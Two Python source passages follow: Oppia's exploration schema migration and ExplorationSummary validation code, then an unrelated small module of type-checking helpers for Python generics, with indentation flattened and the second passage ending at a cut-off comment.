exploration_dict: dict. The dict representation of an exploration
with schema version v12.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v13.
"""
exploration_dict['schema_version'] = 13
exploration_dict['states'] = cls._convert_states_v9_dict_to_v10_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 10
return exploration_dict
@classmethod
def _convert_v13_dict_to_v14_dict(cls, exploration_dict):
"""Converts a v13 exploration dict into a v14 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v13.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v14.
"""
exploration_dict['schema_version'] = 14
exploration_dict['states'] = cls._convert_states_v10_dict_to_v11_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 11
return exploration_dict
@classmethod
def _convert_v14_dict_to_v15_dict(cls, exploration_dict):
"""Converts a v14 exploration dict into a v15 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v14.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v15.
"""
exploration_dict['schema_version'] = 15
exploration_dict['states'] = cls._convert_states_v11_dict_to_v12_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 12
return exploration_dict
@classmethod
def _convert_v15_dict_to_v16_dict(cls, exploration_dict):
"""Converts a v15 exploration dict into a v16 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v15.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v16.
"""
exploration_dict['schema_version'] = 16
exploration_dict['states'] = cls._convert_states_v12_dict_to_v13_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 13
return exploration_dict
@classmethod
def _convert_v16_dict_to_v17_dict(cls, exploration_dict):
"""Converts a v16 exploration dict into a v17 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v16.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v17.
Removes gadgets and skins.
"""
exploration_dict['schema_version'] = 17
if 'skin_customizations' in exploration_dict:
del exploration_dict['skin_customizations']
return exploration_dict
@classmethod
def _convert_v17_dict_to_v18_dict(cls, exploration_dict):
"""Converts a v17 exploration dict into a v18 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v17.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v18.
Adds auto_tts_enabled property.
"""
exploration_dict['schema_version'] = 18
if exploration_dict['category'] == 'Languages':
exploration_dict['auto_tts_enabled'] = False
else:
exploration_dict['auto_tts_enabled'] = True
return exploration_dict
@classmethod
def _convert_v18_dict_to_v19_dict(cls, exploration_dict):
"""Converts a v18 exploration dict into a v19 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v18.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v19.
Adds audio translations to feedback, hints, and solutions.
"""
exploration_dict['schema_version'] = 19
exploration_dict['states'] = cls._convert_states_v13_dict_to_v14_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 14
return exploration_dict
@classmethod
def _convert_v19_dict_to_v20_dict(cls, exploration_dict):
"""Converts a v19 exploration dict into a v20 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v19.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v20.
Introduces a correctness property at the top level, and changes each
answer group's "correct" field to "labelled_as_correct" instead.
"""
exploration_dict['schema_version'] = 20
exploration_dict['states'] = cls._convert_states_v14_dict_to_v15_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 15
exploration_dict['correctness_feedback_enabled'] = False
return exploration_dict
@classmethod
def _convert_v20_dict_to_v21_dict(cls, exploration_dict):
"""Converts a v20 exploration dict into a v21 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v20.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v21.
Adds a refresher_exploration_id field to each answer group outcome, and
to the default outcome (if it exists).
"""
exploration_dict['schema_version'] = 21
exploration_dict['states'] = cls._convert_states_v15_dict_to_v16_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 16
return exploration_dict
@classmethod
def _convert_v21_dict_to_v22_dict(cls, exploration_dict):
"""Converts a v21 exploration dict into a v22 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v21.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v22.
Moves the labelled_as_correct field from the answer group level to the
outcome level, and adds two extra customization args to the
FractionInput interaction.
"""
exploration_dict['schema_version'] = 22
exploration_dict['states'] = cls._convert_states_v16_dict_to_v17_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 17
return exploration_dict
@classmethod
def _convert_v22_dict_to_v23_dict(cls, exploration_dict):
"""Converts a v22 exploration dict into a v23 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v22.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v23.
Adds a new customization arg to FractionInput interactions
which allows you to add custom placeholders.
"""
exploration_dict['schema_version'] = 23
exploration_dict['states'] = cls._convert_states_v17_dict_to_v18_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 18
return exploration_dict
@classmethod
def _convert_v23_dict_to_v24_dict(cls, exploration_dict):
"""Converts a v23 exploration dict into a v24 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v23.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v24.
Adds training_data parameter to each answer group to store training
data of corresponding answer group.
"""
exploration_dict['schema_version'] = 24
exploration_dict['states'] = cls._convert_states_v18_dict_to_v19_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 19
return exploration_dict
@classmethod
def _convert_v24_dict_to_v25_dict(cls, exploration_dict):
"""Converts a v24 exploration dict into a v25 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v24.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v25.
Adds additional tagged_misconception_id and
missing_prerequisite_skill_id fields to answer groups and outcomes
respectively.
"""
exploration_dict['schema_version'] = 25
exploration_dict['states'] = cls._convert_states_v19_dict_to_v20_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 20
return exploration_dict
@classmethod
def _convert_v25_dict_to_v26_dict(cls, exploration_dict):
"""Converts a v25 exploration dict into a v26 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v25.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v26.
        Moves audio_translations into a separate dict.
"""
exploration_dict['schema_version'] = 26
exploration_dict['states'] = cls._convert_states_v20_dict_to_v21_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 21
return exploration_dict
@classmethod
def _convert_v26_dict_to_v27_dict(cls, exploration_dict):
"""Converts a v26 exploration dict into a v27 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v26.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v27.
Converts all Rich Text Editor content to be compatible with the
textAngular format.
"""
exploration_dict['schema_version'] = 27
exploration_dict['states'] = cls._convert_states_v21_dict_to_v22_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 22
return exploration_dict
@classmethod
def _convert_v27_dict_to_v28_dict(cls, exploration_dict):
"""Converts a v27 exploration dict into a v28 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v27.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v28.
Adds caption attribute to all oppia-noninteractive-image tags.
"""
exploration_dict['schema_version'] = 28
exploration_dict['states'] = cls._convert_states_v22_dict_to_v23_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 23
return exploration_dict
@classmethod
def _convert_v28_dict_to_v29_dict(cls, exploration_dict):
"""Converts a v28 exploration dict into a v29 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v28.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v29.
Converts all Rich Text Editor content to be compatible with the
CKEditor format.
"""
exploration_dict['schema_version'] = 29
exploration_dict['states'] = cls._convert_states_v23_dict_to_v24_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 24
return exploration_dict
@classmethod
def _convert_v29_dict_to_v30_dict(cls, exp_id, exploration_dict):
"""Converts a v29 exploration dict into a v30 exploration dict.
Args:
exp_id: str. ID of the exploration.
exploration_dict: dict. The dict representation of an exploration
with schema version v29.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v30.
Adds dimensions to all oppia-noninteractive-image tags.
"""
exploration_dict['schema_version'] = 30
exploration_dict['states'] = cls._convert_states_v24_dict_to_v25_dict(
exp_id, exploration_dict['states'])
exploration_dict['states_schema_version'] = 25
return exploration_dict
@classmethod
def _convert_v30_dict_to_v31_dict(cls, exploration_dict):
"""Converts a v30 exploration dict into a v31 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v30.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v31.
Adds a new customization arg to DragAndDropSortInput interactions
which allows multiple sort items in the same position.
"""
exploration_dict['schema_version'] = 31
exploration_dict['states'] = cls._convert_states_v25_dict_to_v26_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 26
return exploration_dict
@classmethod
def _convert_v31_dict_to_v32_dict(cls, exploration_dict):
"""Converts a v31 exploration dict into a v32 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v31.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v32.
        Adds a written_translations dict to each state for adding text
        translations.
"""
exploration_dict['schema_version'] = 32
exploration_dict['states'] = cls._convert_states_v26_dict_to_v27_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 27
return exploration_dict
@classmethod
def _convert_v32_dict_to_v33_dict(cls, exploration_dict):
"""Converts a v32 exploration dict into a v33 exploration dict.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v32.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v33.
Replaces content_ids_to_audio_translations with recorded_voiceovers in
each state of the exploration.
"""
exploration_dict['schema_version'] = 33
exploration_dict['states'] = cls._convert_states_v27_dict_to_v28_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 28
return exploration_dict
@classmethod
def _convert_v33_dict_to_v34_dict(cls, exploration_dict):
"""Converts a v33 exploration dict into a v34 exploration dict.
Adds solicit_answer_details in state to ask learners for the
answer details.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v33.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v34.
"""
exploration_dict['schema_version'] = 34
exploration_dict['states'] = cls._convert_states_v28_dict_to_v29_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 29
return exploration_dict
@classmethod
def _convert_v34_dict_to_v35_dict(cls, exploration_dict):
"""Converts a v34 exploration dict into a v35 exploration dict.
Replaces tagged_misconception_id with tagged_skill_misconception_id,
which contains the skill id and misconception id of the tagged
misconception, connected by '-'.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v34.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v35.
"""
exploration_dict['schema_version'] = 35
exploration_dict['states'] = cls._convert_states_v29_dict_to_v30_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 30
return exploration_dict
@classmethod
def _convert_v35_dict_to_v36_dict(cls, exploration_dict):
"""Converts a v35 exploration dict into a v36 exploration dict.
        Updates the Voiceover model in existing explorations to have a
        duration_secs attribute initialised to 0.0.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v35.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v36.
"""
exploration_dict['schema_version'] = 36
exploration_dict['states'] = cls._convert_states_v30_dict_to_v31_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 31
return exploration_dict
@classmethod
def _convert_v36_dict_to_v37_dict(cls, exploration_dict):
"""Converts a v36 exploration dict into a v37 exploration dict.
Adds a new customization arg to SetInput interactions
which allows creators to customize the "Add item" button.
Args:
exploration_dict: dict. The dict representation of an exploration
with schema version v36.
Returns:
dict. The dict representation of the Exploration domain object,
following schema version v37.
"""
exploration_dict['schema_version'] = 37
exploration_dict['states'] = cls._convert_states_v31_dict_to_v32_dict(
exploration_dict['states'])
exploration_dict['states_schema_version'] = 32
return exploration_dict
@classmethod
def _migrate_to_latest_yaml_version(
cls, yaml_content, exp_id, title=None, category=None):
"""Return the YAML content of the exploration in the latest schema
format.
Args:
yaml_content: str. The YAML representation of the exploration.
exp_id: str. ID of the exploration.
title: str. The exploration title.
category: str. The exploration category.
Returns:
tuple(dict, int). The dict 'exploration_dict' is the representation
of the Exploration and the 'initial_schema_version' is the initial
schema version provided in 'yaml_content'.
Raises:
Exception: 'yaml_content' or the exploration schema version is not
valid.
"""
try:
exploration_dict = utils.dict_from_yaml(yaml_content)
except Exception as e:
raise Exception(
'Please ensure that you are uploading a YAML text file, not '
'a zip file. The YAML parser returned the following error: %s'
% e)
exploration_schema_version = exploration_dict.get('schema_version')
initial_schema_version = exploration_schema_version
if exploration_schema_version is None:
raise Exception('Invalid YAML file: no schema version specified.')
if not (1 <= exploration_schema_version
<= cls.CURRENT_EXP_SCHEMA_VERSION):
raise Exception(
'Sorry, we can only process v1 to v%s exploration YAML files '
'at present.' % cls.CURRENT_EXP_SCHEMA_VERSION)
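        # Each block below upgrades the dict by exactly one schema version and
        # then falls through to the next check, so an exploration at any
        # supported version is migrated step by step up to the current schema
        # version.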
if exploration_schema_version == 1:
exploration_dict = cls._convert_v1_dict_to_v2_dict(
exploration_dict)
exploration_schema_version = 2
if exploration_schema_version == 2:
exploration_dict = cls._convert_v2_dict_to_v3_dict(
exploration_dict)
exploration_schema_version = 3
if exploration_schema_version == 3:
exploration_dict = cls._convert_v3_dict_to_v4_dict(
exploration_dict)
exploration_schema_version = 4
if exploration_schema_version == 4:
exploration_dict = cls._convert_v4_dict_to_v5_dict(
exploration_dict)
exploration_schema_version = 5
if exploration_schema_version == 5:
exploration_dict = cls._convert_v5_dict_to_v6_dict(
exploration_dict)
exploration_schema_version = 6
if exploration_schema_version == 6:
exploration_dict = cls._convert_v6_dict_to_v7_dict(
exploration_dict)
exploration_schema_version = 7
if exploration_schema_version == 7:
exploration_dict = cls._convert_v7_dict_to_v8_dict(
exploration_dict)
exploration_schema_version = 8
if exploration_schema_version == 8:
exploration_dict = cls._convert_v8_dict_to_v9_dict(
exploration_dict)
exploration_schema_version = 9
if exploration_schema_version == 9:
exploration_dict = cls._convert_v9_dict_to_v10_dict(
exploration_dict, title, category)
exploration_schema_version = 10
if exploration_schema_version == 10:
exploration_dict = cls._convert_v10_dict_to_v11_dict(
exploration_dict)
exploration_schema_version = 11
if exploration_schema_version == 11:
exploration_dict = cls._convert_v11_dict_to_v12_dict(
exploration_dict)
exploration_schema_version = 12
if exploration_schema_version == 12:
exploration_dict = cls._convert_v12_dict_to_v13_dict(
exploration_dict)
exploration_schema_version = 13
if exploration_schema_version == 13:
exploration_dict = cls._convert_v13_dict_to_v14_dict(
exploration_dict)
exploration_schema_version = 14
if exploration_schema_version == 14:
exploration_dict = cls._convert_v14_dict_to_v15_dict(
exploration_dict)
exploration_schema_version = 15
if exploration_schema_version == 15:
exploration_dict = cls._convert_v15_dict_to_v16_dict(
exploration_dict)
exploration_schema_version = 16
if exploration_schema_version == 16:
exploration_dict = cls._convert_v16_dict_to_v17_dict(
exploration_dict)
exploration_schema_version = 17
if exploration_schema_version == 17:
exploration_dict = cls._convert_v17_dict_to_v18_dict(
exploration_dict)
exploration_schema_version = 18
if exploration_schema_version == 18:
exploration_dict = cls._convert_v18_dict_to_v19_dict(
exploration_dict)
exploration_schema_version = 19
if exploration_schema_version == 19:
exploration_dict = cls._convert_v19_dict_to_v20_dict(
exploration_dict)
exploration_schema_version = 20
if exploration_schema_version == 20:
exploration_dict = cls._convert_v20_dict_to_v21_dict(
exploration_dict)
exploration_schema_version = 21
if exploration_schema_version == 21:
exploration_dict = cls._convert_v21_dict_to_v22_dict(
exploration_dict)
exploration_schema_version = 22
if exploration_schema_version == 22:
exploration_dict = cls._convert_v22_dict_to_v23_dict(
exploration_dict)
exploration_schema_version = 23
if exploration_schema_version == 23:
exploration_dict = cls._convert_v23_dict_to_v24_dict(
exploration_dict)
exploration_schema_version = 24
if exploration_schema_version == 24:
exploration_dict = cls._convert_v24_dict_to_v25_dict(
exploration_dict)
exploration_schema_version = 25
if exploration_schema_version == 25:
exploration_dict = cls._convert_v25_dict_to_v26_dict(
exploration_dict)
exploration_schema_version = 26
if exploration_schema_version == 26:
exploration_dict = cls._convert_v26_dict_to_v27_dict(
exploration_dict)
exploration_schema_version = 27
if exploration_schema_version == 27:
exploration_dict = cls._convert_v27_dict_to_v28_dict(
exploration_dict)
exploration_schema_version = 28
if exploration_schema_version == 28:
exploration_dict = cls._convert_v28_dict_to_v29_dict(
exploration_dict)
exploration_schema_version = 29
if exploration_schema_version == 29:
exploration_dict = cls._convert_v29_dict_to_v30_dict(
exp_id, exploration_dict)
exploration_schema_version = 30
if exploration_schema_version == 30:
exploration_dict = cls._convert_v30_dict_to_v31_dict(
exploration_dict)
exploration_schema_version = 31
if exploration_schema_version == 31:
exploration_dict = cls._convert_v31_dict_to_v32_dict(
exploration_dict)
exploration_schema_version = 32
if exploration_schema_version == 32:
exploration_dict = cls._convert_v32_dict_to_v33_dict(
exploration_dict)
exploration_schema_version = 33
if exploration_schema_version == 33:
exploration_dict = cls._convert_v33_dict_to_v34_dict(
exploration_dict)
exploration_schema_version = 34
if exploration_schema_version == 34:
exploration_dict = cls._convert_v34_dict_to_v35_dict(
exploration_dict)
exploration_schema_version = 35
if exploration_schema_version == 35:
exploration_dict = cls._convert_v35_dict_to_v36_dict(
exploration_dict)
exploration_schema_version = 36
if exploration_schema_version == 36:
exploration_dict = cls._convert_v36_dict_to_v37_dict(
exploration_dict)
exploration_schema_version = 37
return (exploration_dict, initial_schema_version)
@classmethod
def from_yaml(cls, exploration_id, yaml_content):
"""Creates and returns exploration from a YAML text string for YAML
schema versions 10 and later.
Args:
exploration_id: str. The id of the exploration.
yaml_content: str. The YAML representation of the exploration.
Returns:
Exploration. The corresponding exploration domain object.
Raises:
Exception: The initial schema version of exploration is less than
or equal to 9.
"""
migration_result = cls._migrate_to_latest_yaml_version(
yaml_content, exploration_id)
exploration_dict = migration_result[0]
initial_schema_version = migration_result[1]
if (initial_schema_version <=
cls.LAST_UNTITLED_SCHEMA_VERSION):
raise Exception(
'Expected a YAML version >= 10, received: %d' % (
initial_schema_version))
exploration_dict['id'] = exploration_id
return Exploration.from_dict(exploration_dict)
@classmethod
def from_untitled_yaml(cls, exploration_id, title, category, yaml_content):
"""Creates and returns exploration from a YAML text string. This is
for importing explorations using YAML schema version 9 or earlier.
Args:
exploration_id: str. The id of the exploration.
title: str. The exploration title.
category: str. The exploration category.
yaml_content: str. The YAML representation of the exploration.
Returns:
Exploration. The corresponding exploration domain object.
        Raises:
            Exception: The initial schema version of the exploration is
                greater than 9.
"""
migration_result = cls._migrate_to_latest_yaml_version(
yaml_content, exploration_id, title=title, category=category)
exploration_dict = migration_result[0]
initial_schema_version = migration_result[1]
if (initial_schema_version >
cls.LAST_UNTITLED_SCHEMA_VERSION):
raise Exception(
'Expected a YAML version <= 9, received: %d' % (
initial_schema_version))
exploration_dict['id'] = exploration_id
return Exploration.from_dict(exploration_dict)
def to_yaml(self):
"""Convert the exploration domain object into YAML string.
Returns:
str. The YAML representation of this exploration.
"""
exp_dict = self.to_dict()
exp_dict['schema_version'] = self.CURRENT_EXP_SCHEMA_VERSION
# The ID is the only property which should not be stored within the
# YAML representation.
del exp_dict['id']
return python_utils.yaml_from_dict(exp_dict)
def to_dict(self):
"""Returns a copy of the exploration as a dictionary. It includes all
necessary information to represent the exploration.
Returns:
dict. A dict mapping all fields of Exploration instance.
"""
return copy.deepcopy({
'id': self.id,
'title': self.title,
'category': self.category,
'author_notes': self.author_notes,
'blurb': self.blurb,
'states_schema_version': self.states_schema_version,
'init_state_name': self.init_state_name,
'language_code': self.language_code,
'objective': self.objective,
'param_changes': self.param_change_dicts,
'param_specs': self.param_specs_dict,
'tags': self.tags,
'auto_tts_enabled': self.auto_tts_enabled,
'correctness_feedback_enabled': self.correctness_feedback_enabled,
'states': {state_name: state.to_dict()
for (state_name, state) in self.states.items()}
})
def to_player_dict(self):
"""Returns a copy of the exploration suitable for inclusion in the
learner view.
Returns:
dict. A dict mapping some fields of Exploration instance. The
fields inserted in the dict (as key) are:
- init_state_name: str. The name for the initial state of the
exploration.
                - param_changes: list(dict). List of param_change dicts that
                    represent ParamChange domain objects.
- param_specs: dict. A dict where each key-value pair
represents respectively, a param spec name and a dict used
to initialize a ParamSpec domain object.
- states: dict. Keys are states names and values are dict
representation of State domain object.
- title: str. The exploration title.
- objective: str. The exploration objective.
- language_code: str. The language code of the exploration.
                - correctness_feedback_enabled: bool. Whether to show
                    correctness feedback.
"""
return {
'init_state_name': self.init_state_name,
'param_changes': self.param_change_dicts,
'param_specs': self.param_specs_dict,
'states': {
state_name: state.to_dict()
for (state_name, state) in self.states.items()
},
'title': self.title,
'objective': self.objective,
'language_code': self.language_code,
'correctness_feedback_enabled': self.correctness_feedback_enabled,
}
def get_all_html_content_strings(self):
"""Gets all html content strings used in this exploration.
Returns:
list(str). The list of html content strings.
"""
html_list = []
for state in self.states.values():
content_html = state.content.html
interaction_html_list = (
state.interaction.get_all_html_content_strings())
html_list = html_list + [content_html] + interaction_html_list
return html_list
class ExplorationSummary(python_utils.OBJECT):
"""Domain object for an Oppia exploration summary."""
def __init__(
self, exploration_id, title, category, objective,
language_code, tags, ratings, scaled_average_rating, status,
community_owned, owner_ids, editor_ids, voice_artist_ids,
viewer_ids, contributor_ids, contributors_summary, version,
exploration_model_created_on,
exploration_model_last_updated,
first_published_msec):
"""Initializes a ExplorationSummary domain object.
Args:
exploration_id: str. The exploration id.
title: str. The exploration title.
category: str. The exploration category.
objective: str. The exploration objective.
language_code: str. The code that represents the exploration
language.
tags: list(str). List of tags.
ratings: dict. Dict whose keys are '1', '2', '3', '4', '5' and
whose values are nonnegative integers representing frequency
counts. Note that the keys need to be strings in order for this
dict to be JSON-serializable.
scaled_average_rating: float. The average rating.
status: str. The status of the exploration.
community_owned: bool. Whether the exploration is community-owned.
            owner_ids: list(str). List of the user ids of the owners of
                this exploration.
            editor_ids: list(str). List of the user ids of users who have
                access to edit this exploration.
            voice_artist_ids: list(str). List of the user ids of users who
                have access to voiceover this exploration.
            viewer_ids: list(str). List of the user ids of users who have
                access to view this exploration.
            contributor_ids: list(str). List of the user ids of users who
                have contributed to this exploration.
contributors_summary: dict. A summary about contributors of current
exploration. The keys are user ids and the values are the
number of commits made by that user.
version: int. The version of the exploration.
exploration_model_created_on: datetime.datetime. Date and time when
the exploration model is created.
exploration_model_last_updated: datetime.datetime. Date and time
when the exploration model was last updated.
first_published_msec: int. Time in milliseconds since the Epoch,
when the exploration was first published.
"""
self.id = exploration_id
self.title = title
self.category = category
self.objective = objective
self.language_code = language_code
self.tags = tags
self.ratings = ratings
self.scaled_average_rating = scaled_average_rating
self.status = status
self.community_owned = community_owned
self.owner_ids = owner_ids
self.editor_ids = editor_ids
self.voice_artist_ids = voice_artist_ids
self.viewer_ids = viewer_ids
self.contributor_ids = contributor_ids
self.contributors_summary = contributors_summary
self.version = version
self.exploration_model_created_on = exploration_model_created_on
self.exploration_model_last_updated = exploration_model_last_updated
self.first_published_msec = first_published_msec
def validate(self):
"""Validates various properties of the ExplorationSummary.
Raises:
ValidationError: One or more attributes of the ExplorationSummary
are invalid.
"""
if not isinstance(self.title, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected title to be a string, received %s' % self.title)
utils.require_valid_name(
self.title, 'the exploration title', allow_empty=True)
if not isinstance(self.category, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected category to be a string, received %s'
% self.category)
utils.require_valid_name(
self.category, 'the exploration category', allow_empty=True)
if not isinstance(self.objective, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected objective to be a string, received %s' %
self.objective)
if not isinstance(self.language_code, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected language_code to be a string, received %s' %
self.language_code)
if not utils.is_valid_language_code(self.language_code):
raise utils.ValidationError(
'Invalid language_code: %s' % self.language_code)
if not isinstance(self.tags, list):
raise utils.ValidationError(
'Expected \'tags\' to be a list, received %s' % self.tags)
for tag in self.tags:
if not isinstance(tag, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected each tag in \'tags\' to be a string, received '
'\'%s\'' % tag)
if not tag:
raise utils.ValidationError('Tags should be non-empty.')
if not re.match(constants.TAG_REGEX, tag):
raise utils.ValidationError(
'Tags should only contain lowercase letters and spaces, '
'received \'%s\'' % tag)
if (tag[0] not in string.ascii_lowercase or
tag[-1] not in string.ascii_lowercase):
raise utils.ValidationError(
'Tags should not start or end with whitespace, received '
'\'%s\'' % tag)
if re.search(r'\s\s+', tag):
raise utils.ValidationError(
'Adjacent whitespace in tags should be collapsed, '
'received \'%s\'' % tag)
if len(set(self.tags)) != len(self.tags):
raise utils.ValidationError('Some tags duplicate each other')
if not isinstance(self.ratings, dict):
raise utils.ValidationError(
'Expected ratings to be a dict, received %s' % self.ratings)
valid_rating_keys = ['1', '2', '3', '4', '5']
actual_rating_keys = sorted(self.ratings.keys())
if valid_rating_keys != actual_rating_keys:
raise utils.ValidationError(
'Expected ratings to have keys: %s, received %s' % (
(', ').join(valid_rating_keys),
(', ').join(actual_rating_keys)))
for value in self.ratings.values():
if not isinstance(value, int):
raise utils.ValidationError(
'Expected value to be int, received %s' % value)
if value < 0:
raise utils.ValidationError(
'Expected value to be non-negative, received %s' % (
value))
if not isinstance(self.scaled_average_rating, float):
raise utils.ValidationError(
'Expected scaled_average_rating to be float, received %s' % (
self.scaled_average_rating))
if not isinstance(self.status, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected status to be string, received %s' % self.status)
if not isinstance(self.community_owned, bool):
raise utils.ValidationError(
'Expected community_owned to be bool, received %s' % (
self.community_owned))
if not isinstance(self.owner_ids, list):
raise utils.ValidationError(
'Expected owner_ids to be list, received %s' % self.owner_ids)
for owner_id in self.owner_ids:
if not isinstance(owner_id, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected each id in owner_ids to '
'be string, received %s' % owner_id)
if not isinstance(self.editor_ids, list):
raise utils.ValidationError(
'Expected editor_ids to be list, received %s' % self.editor_ids)
for editor_id in self.editor_ids:
if not isinstance(editor_id, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected each id in editor_ids to '
'be string, received %s' % editor_id)
if not isinstance(self.voice_artist_ids, list):
raise utils.ValidationError(
'Expected voice_artist_ids to be list, received %s' % (
self.voice_artist_ids))
for voice_artist_id in self.voice_artist_ids:
if not isinstance(voice_artist_id, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected each id in voice_artist_ids to '
'be string, received %s' % voice_artist_id)
if not isinstance(self.viewer_ids, list):
raise utils.ValidationError(
'Expected viewer_ids to be list, received %s' % self.viewer_ids)
for viewer_id in self.viewer_ids:
if not isinstance(viewer_id, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected each id in viewer_ids to '
'be string, received %s' % viewer_id)
if not isinstance(self.contributor_ids, list):
raise utils.ValidationError(
'Expected contributor_ids to be list, received %s' % (
self.contributor_ids))
for contributor_id in self.contributor_ids:
if not isinstance(contributor_id, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected each id in contributor_ids to '
'be string, received %s' % contributor_id)
if not isinstance(self.contributors_summary, dict):
raise utils.ValidationError(
'Expected contributors_summary to be dict, received %s' % (
self.contributors_summary))
def to_metadata_dict(self):
"""Given an exploration summary, this method returns a dict containing
id, title and objective of the exploration.
Returns:
A metadata dict for the given exploration summary.
The metadata dict has three keys:
- 'id': str. The exploration ID.
- 'title': str. The exploration title.
- 'objective': str. The exploration objective.
"""
return {
'id': self.id,
'title': self.title,
'objective': self.objective,
}
def is_private(self):
"""Checks whether the exploration is private.
Returns:
bool. Whether the exploration is private.
"""
return self.status == constants.ACTIVITY_STATUS_PRIVATE
def is_solely_owned_by_user(self, user_id):
"""Checks whether the exploration is solely owned by the user.
Args:
user_id: str. The id of the user.
Returns:
bool. Whether the exploration is solely owned by the user.
"""
return user_id in self.owner_ids and len(self.owner_ids) == 1
|
import inspect
import typing
from abc import ABC
import builtins
def get_builtins():
return list(filter(lambda x: not x.startswith('_'), dir(builtins)))
class ITypeChecker(ABC):
def is_class(self, obj):
if inspect.isclass(obj) and not self.is_primitive(obj):
return True
return False
def is_primitive(self, obj):
        return obj.__name__ in get_builtins()
def is_generic(self, class_type):
pass
def is_base_generic(self, class_type):
pass
# python 3.7
if hasattr(typing, '_GenericAlias'):
class TypeChecker(ITypeChecker):
def is_generic(self, class_type):
return self._is_generic(class_type)
def is_base_generic(self, class_type):
return self._is_base_generic(class_type)
def _is_generic(self, cls):
if isinstance(cls, typing._GenericAlias):
return True
if isinstance(cls, typing._SpecialForm):
return cls not in {typing.Any}
return False
def _is_base_generic(self, cls):
if isinstance(cls, typing._GenericAlias):
if cls.__origin__ in {typing.Generic, typing._Protocol}:
return False
if isinstance(cls, typing._VariadicGenericAlias):
return True
return len(cls.__parameters__) > 0
if isinstance(cls, typing._SpecialForm):
return cls._name in {'ClassVar', 'Union', 'Optional'}
return False
elif hasattr(typing, '_Union'):
class TypeChecker(ITypeChecker):
# python 3.6
def is_generic(self, class_type):
return self._is_generic(class_type)
def is_base_generic(self, class_type):
return self._is_base_generic(class_type)
def _is_generic(self, cls):
if isinstance(cls, (typing.GenericMeta, typing._Union, typing._Optional, typing._ClassVar)):
return True
return False
def _is_base_generic(self, cls):
if isinstance(cls, (typing.GenericMeta, typing._Union)):
return cls.__args__ in {None, ()}
if isinstance(cls, typing._Optional):
return True
return False
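# A small usage sketch, not part of the original module. It assumes one of the
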